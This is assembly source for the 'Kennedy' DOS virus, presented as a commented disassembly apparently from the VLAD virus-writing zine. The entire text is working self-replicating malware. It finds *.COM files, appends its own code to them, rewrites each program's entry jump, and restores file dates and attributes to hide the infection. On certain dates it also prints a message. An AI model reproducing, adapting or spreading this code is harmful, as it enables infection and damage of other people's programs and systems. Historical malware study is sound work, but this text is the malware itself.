; D A R K M A N
; Proudly Presents
; D I S A S S E M B L Y O F K E N N E D Y
kennedy segment
assume cs:kennedy,ds:kennedy
org 100h ; Origin of COM-file
code:
jumpinst db 0e9h,0ch,00h ; Jump to viruscode
nop
nop
nop
int 20h ; Exit to DOS!
virusname db 'Kennedy'
viruscode:
call kennedycode
kennedycode:
pop si ; Load SI from stack
sub si,10fh ; SI = delta offset
mov bp,[si+offset jumpadr-3]
mov ah,2ah ; Get system date
int 21h ; Do it!
cmp dx,606h ; 6th July?
jz announce ; Yes? Jump to announce
cmp dx,0b12h ; 18th December?
jz announce ; Yes? Jump to announce
cmp dx,0b16h ; 22th December?
jz announce ; Yes? Jump to announce
lea dx,[si+filespec-3] ; DX = offset of filespec
xor cx,cx ; Clear CX
mov ah,4eh ; Find first matching file
findnext:
int 21h ; Do it!
jb virusexit ; Error? Jump to virusexit
call checkfile
jb virusexit ; Error? Jump to virusexit
mov ah,4fh ; Find next matching file
jmp findnext
virusexit:
mov ax,bp
add ax,103h ; AX = offset of real code
jmp ax ; Jump to the real code
announce:
lea dx,[si+announcement-3]
mov ah,09h ; Standard output string
int 21h ; Do it!
jmp virusexit
checkfile:
mov ax,4300h ; Get file attributes
mov dx,9eh ; DX = offset of filname in DTA
int 21h ; Do it!
mov [si+offset fileinfo],cx
mov ax,4301h ; Set file attributes
xor cx,cx ; Clear CX
int 21h ; Do it!
mov ax,3d02h ; Open file (read/write file)
int 21h ; Do it!
mov bx,ax
mov ah,3fh ; Read from file
lea dx,[si+offset fileinfo-3]
mov di,dx
mov cx,03h ; Read 3 bytes
int 21h ; Do it!
cmp byte ptr [di],0e9h ; First instruction jump?
jz infectfile ; Yes? Jump to infectfile
restoreattr:
call setfileattr
clc ; Clear carry flag
ret ; Return!
infectfile:
mov dx,[di+01h]
mov [si+offset jumpadr-3],dx
xor cx,cx ; Clear CX
mov ax,4200h ; Move file pointer from beginning
int 21h ; Do it!
mov dx,di
mov cx,02h ; Read 2 bytes
mov ah,3fh ; Read from file
int 21h ; Do it!
cmp [di],6465h ; Already infected?
jz restoreattr ; Yes? Jump to restoreattr
xor dx,dx ; Clear DX
xor cx,cx ; Clear CX
mov ax,4202h ; Move file pointer from end
int 21h ; Do it!
cmp dx,00h ; DX = 0? (Filesize = 0)
jnz restoreattr ; Not equal? Jump to restoreattr
cmp ax,0fde8h ; AX = 65000? (Filesize >= 65000)
jnb restoreattr ; Greater or equal? Jump restoreattr
add ax,04h ; AX = AX + 4
mov [si+offset fileinfo+6],ax
mov ax,5700h ; Get file date and time
int 21h ; Do it!
mov [si+offset fileinfo+2],cx
mov [si+offset fileinfo+4],dx
mov ah,40h ; Write to file
lea dx,[si+virusname-3]
mov cx,14dh ; Write 333 bytes
int 21h ; Do it!
jb restoredate ; Error? Jump to restoredate
mov ax,4200h ; Move file pointer from beginning
xor cx,cx ; Clear CX
mov dx,01h ; Move file pointer to second byte
int 21h ; Do it!
mov ah,40h ; Write to file
lea dx,[si+offset fileinfo+6]
mov cx,02h ; Write 2 bytes
int 21h ; Do it!
restoredate:
mov cx,[si+offset fileinfo+2]
mov dx,[si+offset fileinfo+4]
mov ax,5701h ; Set file date and time
int 21h ; Do it!
mov ah,3eh ; Close file
int 21h ; Do it!
call setfileattr
stc ; Set carry flag
ret ; Return!
setfileattr:
mov ax,4301h ; Set file attributes
mov cx,[si+offset fileinfo]
int 21h ; Do it!
ret ; Return!
realcodeoff db 03h,00h ; Offset of the real code
filespec db '*.COM',00h ; Filespecification
commandpath db '\COMMAND.COM',00h ; Path of COMMAND.COM
announcement db 'Kennedy er d›d - ' ; This announcement will be
db 'l‘nge leve "The ' ; typed on the screen, if the
db 'Dead Kennedys"' ; virus is activated at one of the
db 0dh,0ah,'$' ; activation dates
fileinfo db 43 dup(?) ; Information about infected file
; and the soon infected file!!!
kennedy ends
end code
- VLAD #2 INDEX -